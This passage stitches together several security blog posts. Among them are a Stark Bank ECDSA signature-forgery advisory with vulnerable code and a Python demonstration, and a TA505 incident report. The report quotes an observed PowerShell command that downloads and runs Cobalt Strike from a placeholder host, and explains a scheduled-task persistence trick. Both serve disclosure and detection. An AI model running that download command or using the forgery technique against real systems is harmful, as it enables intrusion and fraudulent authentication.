To wrap things up, the use of Kubernetes is increasing, so detection engineering for this technology is becoming an important problem to tackle. Kubernetes audit logs allow us to tackle this as they are a great source of events within the Kubernetes cluster and, importantly, are consistent across all platforms that run a Kubernetes cluster. A good detection engineering strategy has multiple layers and includes a variety of detections based on signatures, behaviours, and anomalies. For Kubernetes in particular, we want to focus our efforts on abuse of privileges and the creation of pods. There are multiple approaches to doing this, a few of which we have introduced in this post.

Vaccine Misinformation Part 1: Misinformation Attacks as a Cyber Kill Chain

The open and wide-reaching nature of social media platforms has led them to become breeding grounds for misinformation, the most recent casualty being COVID-19 vaccine information. Misinformation campaigns launched by various sources for different reasons but working towards a common objective – creating vaccine hesitancy – have been successful in triggering and amplifying the cynical nature of people and creating a sense of doubt about the safety and effectiveness of vaccines. This blog post discusses one of our first attempts within NCC Group to examine misinformation from the perspective of a security researcher, as a part of our broader goal of using techniques inspired by digital forensics, threat intelligence, and other fields to study misinformation and how it can be combatted.

Developing misinformation countermeasures requires a multidisciplinary approach. The MisinfoSec Working Group, a part of the Credibility Coalition (an interdisciplinary research committee which aims to develop common standards for information credibility), is developing a framework to understand and describe misinformation attacks using existing cybersecurity principles [1].

In this blogpost, which is part 1 of a series, we take a page out of their book and use the Cyber Kill Chain attack framework to describe the COVID-19 vaccine misinformation attacks occurring on social media platforms like Twitter and Facebook. In the next blogpost, we will use data from studies which analyze the effects of misinformation on vaccination rates to perform a formal risk analysis of vaccine misinformation on social media.

An Overview of the Cyber Kill Chain

The Cyber Kill Chain is a cybersecurity model which describes the different stages in a cyber-based attack. It was developed based on the “Kill Chain” model [2] used by the military to describe how enemies attack a target. By breaking down the attack into discrete steps, the model helps identify vulnerabilities at each stage and develop defense mechanisms to thwart attackers or force them to make enough noise to detect them.

Vaccine Misinformation Attacks as a Cyber Kill Chain

In this section, we use the Cyber Kill Chain defined by Lockheed Martin [3] to describe how misinformation attacks occur on social media. The goal is to study these attacks from a cybersecurity perspective in order to understand them better and come up with solutions by addressing vulnerabilities in each stage of the attack.

In this scenario, we assume that the “attackers” or “threat actors” are individuals or organizations whose objective is to create a sense of confusion about the COVID-19 vaccines. They could be motivated by a variety of factors like money, political agenda, religious beliefs, and so on. For instance, evidence was recently found to indicate the presence of Russian disinformation campaigns on social media [4][5] which attack the Biden administration’s vaccine mandates and sow distrust in the Pfizer and Moderna vaccines to promote the Russian Sputnik vaccine. Anti-vaccine activists, alternative health entrepreneurs and physicians have also been found to be responsible for a lot of the COVID-19 vaccine hoaxes circulating on social media sites including Facebook, Instagram and Twitter [6].

We also assume that the “asset” at risk is the COVID-19 vaccine information on social media, and the “targets” range from government and health organizations to regular users of social media.

Step 1: Reconnaissance

There are two types of reconnaissance:

1. Passive reconnaissance: The attacker acquires information without interacting with the target actors. Since social media platforms are public, this kind of recon is easy for attackers to perform. They can monitor the activity of users with public profiles, follow trends, and study and analyze existing measures in place for thwarting misinformation spread. They can also find existing misinformation created either intentionally or as a joke (spoofs or satire) which they could later use out of context.
2. Active reconnaissance: The attacker interacts with the target to acquire information. In this case, it could mean connecting with users having private profiles by impersonating a legitimate user, using phishing tactics to learn about the targets such as their political affiliation, vaccine opinions and vaccination status (if it is not already publicly available). The attacker could also create an account to snoop around and study other user activity, the social media platform activity and test the various misinformation prevention measures on a small scale.

Step 2: Weaponization

This stage involves the creation of the attack payload i.e., the misinformation. These could be advertisements, posts, images, and links to websites which contain misinformation. The misinformation could be blatantly false information, semantically incorrect information or out of context truths. For example, conspiracy theories like “The COVID-19 vaccines contain microchips that are used to track people” [7] are blatantly false. Blowing up the rare but serious side effects of the vaccine out of proportion is an example of misinformation as truth out of context. Deepfakes can also be used to create convincing misinformation. Spoof videos or misinformation generated accidentally that were already online could also be used by attackers to further their own cause [8].

A lot of social media platforms have been implementing tight restrictions on COVID-19 related posts, so it would be prudent for the attacker to create a payload which can circumvent those restrictions for as long as possible.

Step 3: Delivery

Once the misinformation payload is ready, it needs to be deployed onto social media to reach the target people. This involves creating fake accounts, impersonating legitimate user accounts, making parody accounts/hate groups, and using deep undercover accounts that were created during the recon stage. The recon stage also reveals users or influencers whose beliefs align with the anti-vaccine misinformation which the attacker is attempting to spread. The attackers could convince these users – either through monetary means or by appealing to their shared objective – to spread the misinformation i.e., deliver the payload.

Step 4: Exploitation

The exploitation stage in this scenario refers to the misinformation payloads successfully bypassing misinformation screeners used by the social media platforms (if they exist) and reaching the target demographic i.e., anti-vaxxers, people who are on the fence about the vaccine etc.

Despite several misinformation prevention measures being used by various social media platforms (refer to Table 1), there still seems to be a significant presence and spread of misinformation online. Spreading misinformation on a large scale overwhelms the social media platforms [13] and adds complexity to their misinformation screening process, since it often requires manual intervention and the manpower available is very limited compared to the large volume of misinformation. A study found that some social media sites allowed advertisements with coronavirus misinformation to be published [14], suggesting that some countermeasures may not always be effectively implemented.

The other vulnerability which attackers try to exploit has more to do with human nature and psychology. A study by YouGov [15] showed that 20% of Americans believe that it is “definitely true” or “probably true” that there is a microchip in the COVID-19 vaccines. This success rate of the conspiracy theory was attributed to the coping mechanism of humans to make sense of things which cannot be explained, or when there is a sense of uncertainty [16]. “Anti-vaxxers” have been around for a long time, and with the COVID-19 vaccines there is an even deeper sense of mistrust because of the shorter duration in which it was developed and tested. The overall handling of the COVID-19 pandemic by some government organizations has also been disappointing for the public. Attackers use this sense of chaos and confusion to their advantage to stir the pot further with their misinformation payloads.

Step 5: Installation

The installation stage of the cyber kill chain usually refers to the malware installation by attackers on the target system after delivering the payload. With respect to vaccine misinformation attacks, this stage refers to rallying groups of people and communities towards the attacker’s cause, either online and/or in physical locations. These users act as further carriers of the misinformation across various social media platforms, reinforcing it through reshares, reposts, retweets etc., leading to the misinformation gaining attention and popularity.

Step 6: Command and Control

Once the attacker gains control over users who have seen the misinformation and interacted with it, they can incite further conflict in the conversations surrounding the misinformation, such as through comments of a post. They can also manipulate users into arranging or attending anti-vax rallies or protest vaccine mandates, causing a state of civil unrest.

Step 7: Actions on Objectives

It is safe to assume that the objective of attackers performing vaccine misinformation attacks is usually to lower vaccination rates. This objective can also be extended further and tied to other motives. For example, foreign state-sponsored misinformation attacks targeting US-developed vaccines, such as the Moderna and Pfizer mRNA vaccines, could have been created in order to suggest the superiority of vaccines developed in other nations.

It is important to realize that the purpose of misinformation campaigns is not always to convince people that things are a certain way – rather, it can simply be to seed doubt in a system, or in the quality of information available, making people more confused, overwhelmed, angry, or afraid. The sheer volume of misinformation available online has caused a state of hesitancy and cynicism in some people about the safety and effectiveness of the vaccines, even among people who are not typically “anti-vax”. Attackers generally aim to plant seeds of doubt in as many people’s minds as possible rather than attempting to convince them to not take the vaccine, since confusion is often sufficient to reduce vaccination rates.

Defenses and Mitigations to the Misinformation Kill Chain

The use of the Cyber Kill Chain allows us to not only consider the actions of attackers in the context of information security, but to also consider appropriate defensive actions (both operational and technical). In this section, we will elaborate on the defensive actions that can be taken against various stages in the Misinformation Kill Chain.

In keeping with the well-known information security concepts of layered defense [17] and defense in depth [18], the countermeasures should support and reinforce each other so that, for example, if an attacker is able to bypass technical controls in order to deploy an attack, then staff should step up to respond appropriately and follow an incident response procedure.

The increasing concern about misinformation on social media has resulted in studies by governments in several countries [19], which provide suggestions for combatting the issue, and indications of which countermeasures have been effective [20][21][22]. Some of the measures are applicable at multiple stages of the kill chain. For example, the labelling of misinformation is intended to make a user less likely to read it, less likely to share it and less likely to believe it.

The following countermeasures can be applied at different stages of the kill chain, to help stem the propagation of misinformation and to limit its effectiveness:

Step 1: Reconnaissance

1. Limiting the availability of useful metadata, tracking/logging site visits, and reducing the data that is visible without login, in order to limit information gathering about both individuals and aggregate populations of individuals.
2. Limiting group interaction for non-members in order to restrict anonymous or non-auditable reconnaissance.
3. Implementing effective user verification during account creation to prevent fake accounts.
4. Educating users about spoofing attacks and encouraging them to keep their profiles private and accept requests cautiously.

Step 2: Weaponization

1. Using effective misinformation screeners to block users from creating and posting ads, images, videos or posts with misinformation.
2. Labelling misinformation or grading it according to reliability (based on effective identification), in order to allow users to make a more informed decision on what they read.
3. Removing misinformation (based on effective identification) to prevent it from reaching its target.

Step 3: Delivery

1. Recognition or identification (followed by either removal or marking) of misinformation using machine learning (ML), human observation or a combination of both.
2. Recognition or identification (followed by either removal or suspension) of hostile actors using machine learning (ML), human observation or a combination of both.
3. Identification and removal of bots, especially when used for hostile purposes.

Step 4: Exploitation

1. Public naming of hostile actors in order to limit acceptance of their posts and raise awareness of their motivations and credibility.
2. Encouraging members of the medical field to combat the large volumes of misinformation with equally large volumes of valid and thoroughly vetted information about the safety and effectiveness of, in this case, the COVID-19 vaccines [22].
3. Analyzing and improving the effectiveness of the misinformation prevention measures on social media platforms.
4. Demanding and obtaining transparency and strong messaging from government organizations.

Step 5: Installation

1. Labelling misinformation or grading it according to reliability (based on effective identification).
2. Tracking and removing misinformation (based on effective identification) in order to control its spread.

Step 6: Command and Control

1. Removal of groups or users with a record of repeatedly posting misinformation.
2. Suspending accounts to influence better behavior, in the case of minor transgressions.

Step 7: Actions on Objectives

1. Media Literacy education – this is not a short-term measure but has been reported as very effective in Scandinavia [22] and is proposed as a countermeasure by the US DHS [20] to increase the resilience of the public to misinformation on social media by teaching them how to identify fake news stories and differentiate between facts and opinions.
2. Fact checking – a wider presence of easily accessible sources for the general public and for journalists may assist in wider recognition of misinformation and help to form a general habit of checking against a reliable source.
3. Pro-vaccine messaging on social media – encourage immunizations on social media by emphasizing the immediate and personalized benefits of taking the vaccines, rather than long-term protective or societal benefits, since studies in health communications have shown the former approach to be much more effective than the latter [24]. Studies have also shown that using visual rather than textual means can magnify those benefits [25].

In Part 2 of this blog post series: Risk Analysis of Vaccine Misinformation Attacks

Since social media is an integral part of people’s lives and is often a primary source of information and news for many users, it is safe to assume that it influences the vaccination rates and vaccine hesitancy among its users. This in turn affects the ability of the population to achieve herd immunity and increases the number of people who are more likely to die from COVID-19. Several studies have been conducted recently attempting to understand and quantitatively measure the effects of vaccine misinformation on vaccination rates. Each of these studies used different approaches and metrics across different social media platforms to perform the analysis, but they all conclude the same thing in the end – misinformation lowers intent to accept a COVID-19 vaccine. In our next post in this series, we will look at the results of these studies in more detail and use them to perform a risk analysis of misinformation attacks.

References:

[23] Hernandez RG, Hagen L, Walker K, O’Leary H, Lengacher C. The COVID-19 vaccine social media infodemic: healthcare providers’ missed dose in addressing misinformation and vaccine hesitancy. Hum Vaccin Immunother. 2021 Sep 2;17(9):2962-2964. doi: 10.1080/21645515.2021.1912551. Epub 2021 Apr 23. PMID: 33890838; PMCID: PMC8381841.


Technical Advisory – Arbitrary Signature Forgery in Stark Bank ECDSA Libraries (CVE-2021-43572, CVE-2021-43570, CVE-2021-43569, CVE-2021-43568, CVE-2021-43571)

Vendor: Stark Bank's open-source ECDSA cryptography libraries
Vendor URL: https://starkbank.com/, https://github.com/starkbank/
Versions affected:
- ecdsa-python (https://github.com/starkbank/ecdsa-python) v2.0.0
- ecdsa-java (https://github.com/starkbank/ecdsa-java) v1.0.0
- ecdsa-dotnet (https://github.com/starkbank/ecdsa-dotnet) v1.3.1
- ecdsa-elixir (https://github.com/starkbank/ecdsa-elixir) v1.0.0
- ecdsa-node (https://github.com/starkbank/ecdsa-node) v1.1.2
Author: Paul Bottinelli
Fixed releases:
- ecdsa-python: https://github.com/starkbank/ecdsa-python/releases/tag/v2.0.1
- ecdsa-java: https://github.com/starkbank/ecdsa-java/releases/tag/v1.0.1
- ecdsa-dotnet: https://github.com/starkbank/ecdsa-dotnet/releases/tag/v1.3.2
- ecdsa-elixir: https://github.com/starkbank/ecdsa-elixir/releases/tag/v1.0.1
- ecdsa-node: https://github.com/starkbank/ecdsa-node/releases/tag/v1.1.3
CVE Identifiers:
- ecdsa-python: CVE-2021-43572
- ecdsa-java: CVE-2021-43570
- ecdsa-dotnet: CVE-2021-43569
- ecdsa-elixir: CVE-2021-43568
- ecdsa-node: CVE-2021-43571
Risk: Critical (universal signature forgery for arbitrary messages)

Summary

Stark Bank is a financial technology company that provides services to simplify and automate digital banking, by providing APIs to perform operations such as payments and transfers. In addition, Stark Bank maintains a number of cryptographic libraries to perform cryptographic signing and verification. These popular libraries are meant to be used to integrate with the Stark Bank ecosystem, but are also accessible on popular package manager platforms in order to be used by other projects. The node package manager reports around 16k weekly downloads for the ecdsa-node implementation while the Python implementation boasts over 7.3M downloads in the last 90 days on PyPI. A number of these libraries suffer from a vulnerability in the signature verification functions, allowing attackers to forge signatures for arbitrary messages which successfully verify with any public key.

Impact

An attacker can forge signatures on arbitrary messages that will verify for any public key. This may allow attackers to authenticate as any user within the Stark Bank platform, and bypass signature verification needed to perform operations on the platform, such as send payments and transfer funds. Additionally, the ability for attackers to forge signatures may impact other users and projects using these libraries in different and unforeseen ways.

Details

The (slightly simplified) ECDSA verification of a signature $(r, s)$ on a hashed message $z$ with public key $Q$ and curve order $n$ works as follows:

• Check that $r$ and $s$ are integers in the $[1, n-1]$ range, return Invalid if not.
• Compute $u_1 = zs^{-1} \mod n$ and $u_2 = rs^{-1} \mod n$.
• Compute the elliptic curve point $(x, y) = u_1 G + u_2 Q$, return Invalid if $(x, y)$ is the point at infinity.
• Return Valid if $r \equiv x \mod n$, Invalid otherwise.

The ECDSA signature verification functions in the libraries listed above fail to perform the first check, which ensures that the r and s components of the signature are in the correct range. Specifically, the libraries do not check that the components of the signature are non-zero, an important check mandated by the standard; see X9.62:2005, Section 7.4.1/a:

1. If r’ is not an integer in the interval [1, n-1], then reject the signature.
2. If s’ is not an integer in the interval [1, n-1], then reject the signature.

For example, consider the following excerpt of the verify function from the ecdsa-python implementation.

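def verify(cls, message, signature, publicKey, hashfunc=sha256):
    byteMessage = hashfunc(toBytes(message)).digest()
    numberMessage = numberFromByteString(byteMessage)
    curve = publicKey.curve
    r = signature.r  # no range check on r
    s = signature.s  # no range check on s
    inv = Math.inv(s, curve.N)
    u1 = Math.multiply(curve.G, n=(numberMessage * inv) % curve.N, N=curve.N, A=curve.A, P=curve.P)
    u2 = Math.multiply(publicKey.point, n=(r * inv) % curve.N, N=curve.N, A=curve.A, P=curve.P)
    # The next two lines are missing from the excerpt as extracted; they are
    # reconstructed from the description below (point "add", value "modX").
    add = Math.add(u1, u2, A=curve.A, P=curve.P)
    modX = add.x % curve.N
    return r == modX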

In that code snippet, the values r and s are extracted from the signature without any range check. An attacker supplying a signature equal to (r, s) = (0, 0) will not see their signature rejected. Proceeding with the verification, this function computes the inverse of the s component. Note that the Math.inv() function returns zero when supplied with a zero input (even though 0 does not admit an inverse). The code then computes the values u1 = inv * numberMessage * G and u2 = inv * r * Q, but since inv is zero, u1 and u2 will both be zero, i.e., the point at infinity, regardless of the value of numberMessage (the message hash, which we called $z$ above) and Q (the public key). Subsequently, the implementation computes the intermediary curve point add by adding up the two previously computed points, which again results in the point at infinity. The final line checks that the r-component of the signature is equal to the x-coordinate of the curve point, essentially checking that 0 == 0 for any message and any public key. Therefore, a signature (r, s) = (0, 0) is deemed valid by the code for any message, and under any public key.
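The failure mode described above can be reproduced in a few lines. The following is a minimal sketch and not the Stark Bank code: it reimplements textbook ECDSA verification over secp256k1 in pure Python (3.8 or later). The helper names (inv, add, multiply, verify), the strict flag, and the encoding of the point at infinity as (0, 0) are assumptions chosen to mirror the behaviour described in this advisory.

```python
import hashlib

# secp256k1 domain parameters (public constants).
P = 0xFFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFE_FFFFFC2F
N = 0xFFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFE_BAAEDCE6_AF48A03B_BFD25E8C_D0364141
G = (
    0x79BE667E_F9DCBBAC_55A06295_CE870B07_029BFCDB_2DCE28D9_59F2815B_16F81798,
    0x483ADA77_26A3C465_5DA4FBFC_0E1108A8_FD17B448_A6855419_9C47D08F_FB10D4B8,
)
# Assumption: the point at infinity is encoded as (0, 0), which is not on the curve.
INFINITY = (0, 0)


def inv(x, n):
    """Modular inverse that, like the behaviour described above, maps 0 to 0."""
    return 0 if x % n == 0 else pow(x, -1, n)


def add(p, q):
    """Add two affine points on y^2 = x^3 + 7 over GF(P)."""
    if p == INFINITY:
        return q
    if q == INFINITY:
        return p
    (x1, y1), (x2, y2) = p, q
    if x1 == x2 and (y1 + y2) % P == 0:
        return INFINITY  # p is the negation of q
    if p == q:
        slope = 3 * x1 * x1 * pow(2 * y1, -1, P) % P
    else:
        slope = (y2 - y1) * pow((x2 - x1) % P, -1, P) % P
    x3 = (slope * slope - x1 - x2) % P
    y3 = (slope * (x1 - x3) - y1) % P
    return (x3, y3)


def multiply(point, k):
    """Double-and-add scalar multiplication; k = 0 yields INFINITY."""
    result = INFINITY
    while k:
        if k & 1:
            result = add(result, point)
        point = add(point, point)
        k >>= 1
    return result


def verify(message, r, s, public_key, strict):
    """Textbook ECDSA verification; strict=True adds the X9.62 checks."""
    z = int.from_bytes(hashlib.sha256(message).digest(), "big")
    if strict and not (1 <= r < N and 1 <= s < N):
        return False  # range check on r and s
    w = inv(s, N)
    point = add(multiply(G, z * w % N), multiply(public_key, r * w % N))
    if strict and point == INFINITY:
        return False  # reject the point at infinity
    return r == point[0] % N


public_key = multiply(G, 0x1234)  # arbitrary demo key, not a real one
print(verify(b"transfer all funds", 0, 0, public_key, strict=False))  # True
print(verify(b"transfer all funds", 0, 0, public_key, strict=True))   # False
```

Without the range check, the all-zero signature is accepted for any message and any key; with the check enabled it is rejected before any curve arithmetic takes place.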

Recommendation

Users of the different Stark Bank ECDSA libraries should update to the latest versions. Specifically, the following versions or later should be used.

• ecdsa-python: v2.0.1
• ecdsa-java: v1.0.1
• ecdsa-dotnet: v1.3.2
• ecdsa-elixir: v1.0.1
• ecdsa-node: v1.1.3

Vendor Communication

2021-11-04 – NCC Group reported the vulnerability to Stark Bank developers.
2021-11-04 – Stark Bank acknowledged the issue and started fixing all vulnerable libraries.
2021-11-05 – Stark Bank confirmed that all vulnerable libraries were fixed.
2021-11-08 – Advisory published.

Thanks to

The support team at Stark Bank for their prompt acknowledgement and response, and Jennifer Fernick, Aaron Haymore, Kevin Henry, Marie-Sarah Lacharité, Thomas Pornin, Giacomo Pope and Javed Samuel at NCC Group for their support and careful review during the disclosure process.


Published date: 2021-11-08

Written by:  Paul Bottinelli


TA505 exploits SolarWinds Serv-U vulnerability (CVE-2021-35211) for initial access

NCC Group’s global Cyber Incident Response Team has observed an increase in Clop ransomware victims in the past weeks. The surge can be traced back to a vulnerability in SolarWinds Serv-U that is being abused by the TA505 threat actor. TA505 is an established cybercrime threat actor, known for extortion attacks using the Clop ransomware. We believe exploiting such vulnerabilities is a recent initial access technique for TA505, deviating from the actor’s usual phishing-based approach.

NCC Group strongly advises updating systems running SolarWinds Serv-U software to the most recent version (at minimum version 15.2.3 HF2) and checking whether exploitation has happened as detailed below.

We are sharing this information as a call to action for organisations using SolarWinds Serv-U software and incident responders currently dealing with Clop ransomware.

Modus Operandi

Initial Access

During multiple incident response investigations, NCC Group found that a vulnerable version of SolarWinds Serv-U server appeared to be the initial access used by TA505 to breach its victims’ IT infrastructure. The vulnerability being exploited is known as CVE-2021-35211 [1].

SolarWinds published a security advisory [2] detailing the vulnerability in the Serv-U software on July 9, 2021. The advisory mentions that Serv-U Managed File Transfer and Serv-U Secure FTP are affected by the vulnerability. On July 13, 2021, Microsoft published an article [3] on CVE-2021-35211 being abused by a Chinese threat actor referred to as DEV-0322. Here we describe how TA505, a completely different threat actor, is exploiting that vulnerability.

Successful exploitation of the vulnerability, as described by Microsoft [3], causes Serv-U to spawn a subprocess controlled by the adversary. That enables the adversary to run commands and deploy tools for further penetration into the victim’s network. Exploitation also causes Serv-U to log an exception, as described in the section below on checks for potential compromise.

Execution

We observed that Base64 encoded PowerShell commands were logged shortly after the Serv-U exceptions indicating exploitation. The PowerShell commands ultimately led to deployment of a Cobalt Strike Beacon on the system running the vulnerable Serv-U software.

The PowerShell command observed deploying Cobalt Strike was:

powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('hxxp://IP:PORT/a'))

Persistence

On several occasions the threat actor tried to maintain its foothold by hijacking a scheduled task named RegIdleBackup and abusing the COM handler associated with it to execute malicious code, leading to FlawedGrace RAT.

The RegIdleBackup task is a legitimate task that is stored in \Microsoft\Windows\Registry. The task is normally used to regularly back up the registry hives. By default, the CLSID in the COM handler is set to: {CA767AA8-9157-4604-B64B-40747123D5F2}. In all cases where we observed the threat actor abusing the task for persistence, the COM handler was altered to a different CLSID.

CLSID objects are stored in the registry in HKLM\SOFTWARE\Classes\CLSID. In our investigations the task included a suspicious CLSID, which subsequently redirected to another CLSID. The second CLSID included three objects containing the FlawedGrace RAT loader. The objects contain Base64 encoded strings that ultimately lead to the executable.

Checks for potential compromise

Check for exploitation of Serv-U

NCC Group recommends looking for potentially vulnerable Serv-U FTP servers in your network and checking their logs for traces of similar exceptions, as suggested by the SolarWinds security advisory. It is important to note that the publications by Microsoft and SolarWinds describe follow-up activity regarding a completely different threat actor than we observed in our investigations.

Microsoft’s article [3] on CVE-2021-35211 provides guidance on the detection of the abuse of the vulnerability. The first indicator of compromise for the exploitation of this vulnerability is the presence of suspicious entries in a Serv-U log file named DebugSocketlog.txt. This log file is usually located in the Serv-U installation folder and contains exceptions logged at the time of exploitation of CVE-2021-35211. NCC Group’s analysts encountered the following exceptions during their investigations:

EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive();

However, as mentioned in Microsoft’s article, this exception is not by definition an indicator of successful exploitation and therefore further analysis should be carried out to determine potential compromise.
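As a starting point for triage, the log can be searched for the exception string quoted above. The following is a minimal sketch: the function names are hypothetical, the log encoding is assumed to be UTF-8 compatible, and the path to DebugSocketlog.txt must be supplied by the analyst because it depends on the installation.

```python
import re

# Matches the exception string quoted above; whitespace is matched loosely.
EXCEPTION_RE = re.compile(
    r"EXCEPTION:\s*C0000005;\s*CSUSSHSocket::ProcessReceive\(\);"
)


def find_exception_lines(lines):
    """Return (line_number, text) pairs for lines containing the exception."""
    hits = []
    for number, line in enumerate(lines, start=1):
        if EXCEPTION_RE.search(line):
            hits.append((number, line.rstrip("\r\n")))
    return hits


def scan_log(path):
    """Scan a log file on disk; undecodable bytes are replaced, not fatal."""
    with open(path, encoding="utf-8", errors="replace") as handle:
        return find_exception_lines(handle)
```

A hit only marks a point in time worth investigating; as noted above, the exception alone does not prove successful exploitation.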

Check for suspicious PowerShell commands

Analysts should look for suspicious PowerShell commands being executed close to the date and time of the exceptions. The full content of PowerShell commands is usually recorded in Event ID 4104 in the Windows Event logs.
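When a logged command was launched with PowerShell's -EncodedCommand parameter, the payload is Base64 over UTF-16LE text and can be decoded offline for review. The sketch below assumes that convention; the function names are hypothetical, and Base64 blobs found elsewhere (for example in registry objects) may use a different encoding.

```python
import base64


def decode_encoded_command(blob):
    """Decode a PowerShell -EncodedCommand payload (Base64 over UTF-16LE)."""
    raw = base64.b64decode(blob, validate=True)
    return raw.decode("utf-16-le")


def encode_command(script):
    """Inverse helper, handy for building test fixtures."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


print(decode_encoded_command("ZABpAHIA"))  # dir
```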

Analysts should look for the RegIdleBackup task with an altered CLSID. Subsequently, the suspicious CLSID should be used to query the registry and check for objects containing Base64 encoded strings. The following PowerShell commands assist in checking for the existence of the hijacked task and suspicious CLSID content:

# Check for altered RegIdleBackup task
Export-ScheduledTask -TaskName "RegIdleBackup" -TaskPath "\Microsoft\Windows\Registry\" | Select-String -NotMatch "{CA767AA8-9157-4604-B64B-40747123D5F2}"

# Check for suspicious CLSID registry key content
Get-ChildItem -Path 'HKLM:\SOFTWARE\Classes\CLSID\{SUSPICIOUS_CLSID}'
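For offline triage of task definitions collected from several hosts, the same CLSID comparison can be done on the exported task XML. This is a sketch under assumptions: it expects the XML text produced by Export-ScheduledTask as a Python string, relies on the standard Task Scheduler XML namespace, and uses a hypothetical function name.

```python
import xml.etree.ElementTree as ET

# Namespace used by Task Scheduler task definitions.
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Default COM handler CLSID of RegIdleBackup, as stated above.
DEFAULT_CLSID = "{CA767AA8-9157-4604-B64B-40747123D5F2}"


def altered_com_handlers(task_xml):
    """Return every COM handler ClassId that differs from the default."""
    root = ET.fromstring(task_xml)
    class_ids = [
        element.text.strip()
        for element in root.findall(".//t:ComHandler/t:ClassId", TASK_NS)
        if element.text
    ]
    return [cid for cid in class_ids if cid.upper() != DEFAULT_CLSID]
```

An empty list means the task still points at the default handler; any returned CLSID is a candidate for the registry check.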

Summary of checks

The following steps should be taken to check whether exploitation led to a suspected compromise by TA505:

• Check if your Serv-U version is vulnerable
• Locate the Serv-U’s DebugSocketlog.txt
• Search for entries such as ‘EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive();’ in this log file
• Check for Event ID 4104 in the Windows Event logs surrounding the date/time of the exception and look for suspicious PowerShell commands
• Check for the presence of a hijacked Scheduled Task named RegIdleBackup using the provided PowerShell command
• In case of abuse: the CLSID in the COM handler should NOT be set to {CA767AA8-9157-4604-B64B-40747123D5F2}
• If the task includes a different CLSID: check the content of the CLSID objects in the registry using the provided PowerShell command; any Base64 encoded strings returned can be an indicator of compromise.

Vulnerability Landscape

There are currently still many vulnerable internet-accessible Serv-U servers online around the world.

In July 2021, after Microsoft published its article on the exploitation of Serv-U FTP servers by DEV-0322, NCC Group mapped the internet for vulnerable servers to gauge the potential impact of this vulnerability. In July, 5945 (~94%) of all Serv-U (S)FTP services identified on port 22 were potentially vulnerable. In October, three months after SolarWinds released their patch, the number of potentially vulnerable servers is still significant at 2784 (66.5%).

The top countries with potentially vulnerable Serv-U FTP services at the time of writing are:

Top vulnerable versions identified:

References


Public Report – Zcash NU5 Cryptography Review

In March 2021, Electric Coin Co. engaged NCC Group to perform a review of the upcoming network protocol upgrade NU5 to the Zcash protocol (codenamed “Orchard”). The review was to be performed over multiple phases: first, the specification document changes and the relevant ZIPs, then, in June 2021, the implementation itself.


The Next C Language Standard (C23)

by Robert C. Seacord

The cutoff for new feature proposals for the next C Language Standard (C23) has come and gone, meaning that we know some of the things that will be in the next standard and all of the things that will not be. There are still a bunch of papers that have been submitted but not yet adopted into C23. Some of these papers will be accepted, some will be rejected, and potentially some good ideas won’t make it because of lack of time to perfect them and gain consensus. NCC Group has already had a number of proposals accepted into C23. This blog post reviews an additional five papers that we have submitted and that are currently under consideration.

Clarifying integer terms v2

During a committee discussion of the behavior of calloc, it became clear that the committee lacks a consensus definition of terms such as “overflow” and “wraparound” that are commonly used to discuss integer arithmetic. As a result, the committee can’t answer the simple question “do unsigned numbers overflow?”.

This paper [N2837] is unlikely to change the behavior of the language. However, having taught Secure Coding in C and C++ for 16 years, I can tell you it is extremely important that we have a common shared vocabulary to discuss language behaviors, especially behaviors like overflow and wraparound that commonly result in exploitable vulnerabilities.

Identifier Syntax using Unicode Standard Annex 31

Unicode® Standard Annex #31 Unicode Identifier and Pattern Syntax [Davis 2009] describes specifications for recommended defaults for the use of Unicode in the definitions of identifiers and in pattern-based syntax, and has been adopted by C++, Rust, Python, and other languages. By adopting the recommendations of UAX #31, C will be easier to work with in international environments and less prone to accidental problems. This paper [N2836] also aligns the C language with other current languages that defer to Unicode UAX #31 for identifier syntax.

calloc Wraparound Handling

RUS-CERT [RUS-CERT 2002, Weimer 2002] documented the defect in calloc implementations and similar routines:

Integer overflow can occur during the computation of the memory region size by calloc and similar functions. As a result, the function returns a buffer which is too small, possibly resulting in a subsequent buffer overflow.

While most implementations were repaired, the standard was not updated to clarify the existing requirement.

The problem subsequently reoccurred [MSRC 2021]. The same vulnerability exists in standard memory allocation functions spanning widely used real-time operating systems (RTOS), embedded software development kits (SDKs), and C standard library (libc) implementations. This paper [N2810] clarifies the existing behavior of calloc in the event that nmemb * size wraps around, to help prevent future implementation defects resulting in security vulnerabilities.
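The arithmetic behind the defect is easy to show. Python integers do not wrap, so the sketch below simulates a 32-bit size_t with a mask; the 32-bit width and both function names are assumptions for illustration, and the code does not reproduce the wording proposed in N2810.

```python
SIZE_MAX = 2**32 - 1  # assumption: size_t is 32 bits wide


def naive_alloc_size(nmemb, size):
    """Size a defective calloc would request: the product wraps modulo 2**32."""
    return (nmemb * size) & SIZE_MAX


def checked_alloc_size(nmemb, size):
    """Return the exact size, or None when nmemb * size does not fit in size_t."""
    if size != 0 and nmemb > SIZE_MAX // size:
        return None  # a correct calloc fails here instead of allocating
    return nmemb * size


# 0x40000001 elements of 4 bytes need 0x100000004 bytes, which wraps to 4.
print(naive_alloc_size(0x40000001, 4))    # 4
print(checked_alloc_size(0x40000001, 4))  # None
```

The caller of the defective version receives a 4-byte buffer while believing it holds more than a billion elements, which is the buffer overflow scenario described in the RUS-CERT advisory.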

Annex K Repairs

Annex K Bounds-checking interfaces provides alternative library functions that promote safer, more secure programming. Annex K contains the *_s functions, which verify that output buffers are large enough for the intended result and return a failure indicator if they are not. Annex K’s set_constraint_handler_s function is specified to set the global process-wide runtime-constraint handler and return a pointer to the previously registered process-wide handler. However, because the process-wide handler is shared among all threads in a program, it is not well-suited for multithreaded programs where code runs in separate threads. This paper [N2809] proposes two alternative solutions for using constraint handlers in multithreaded programs.

Volatile C++ Compatibility

The volatile keyword imposes restrictions on access and caching and is often necessary for memory that can be externally modified. Some uses of the volatile keyword are ambiguous, incorrect, or insecure. Consequently, C++ has deprecated many of these uses [P1152R4]. This paper [N2743] proposes deprecating these same uses of the volatile keyword in C for the same reasons, and to maintain compatibility with C++.

References

[Davis 2009] Mark Davis. Unicode Standard Annex #31 Unicode Identifier and Pattern Syntax. September, 2009. URL: http://www.unicode.org/reports/tr31/tr31-11.html

